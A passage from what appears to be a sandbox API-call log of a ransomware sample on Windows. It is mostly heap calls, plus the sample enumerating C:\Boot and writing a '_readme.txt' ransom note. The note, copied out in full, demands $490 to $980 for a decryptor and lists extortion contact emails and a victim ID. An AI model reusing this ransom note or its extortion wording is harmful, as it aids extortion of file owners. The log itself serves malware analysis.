hHeap=0x4970000) returned 1 [0128.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0128.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0128.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0128.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.064] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.064] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.064] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.064] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.064] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.064] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.064] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.064] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.064] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.064] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.064] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.064] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.064] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.064] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.064] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.064] PathFindFileNameW (pszPath="C:\\Boot\\pt-BR\\") returned="pt-BR\\" [0128.064] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0128.064] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.064] PathFindFileNameW (pszPath="") returned="" [0128.064] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0128.064] PathAppendW (in: pszPath="C:\\Boot\\pt-BR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0128.064] PathFileExistsW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 0 [0128.066] lstrcpyW (in: lpString1=0xdd2c688, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" [0128.066] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki", lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" [0128.068] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.068] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3904b80, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3904b80, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.068] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0128.068] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3904b80, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3904b80, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3904b80, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0128.068] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3904b80, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3904b80, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3904b80, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0128.068] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0128.068] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.068] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce92c8 | out: hHeap=0x4970000) returned 1 [0128.068] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce92c8 [0128.068] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.068] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.068] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.068] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.068] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.068] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.068] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.068] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.068] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.068] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.068] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.068] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.068] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.068] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.068] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.068] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.068] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.068] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.068] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.068] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.068] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.068] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.068] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.069] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.069] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.069] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.069] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.069] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0128.069] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.069] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.069] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.069] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.069] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.069] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.069] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.069] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.069] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.069] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.069] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.069] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.069] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.069] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.069] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.069] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.069] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.069] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.069] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.069] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.069] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.069] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.069] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.069] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.069] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.070] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.070] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.070] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.070] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.070] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.070] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.070] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.070] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.070] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.070] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.070] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.070] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.070] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.070] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.070] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.070] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.070] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.070] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.070] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.070] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.070] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.070] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.070] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.070] RtlAllocateHeap (HeapHandle=0x4970000, 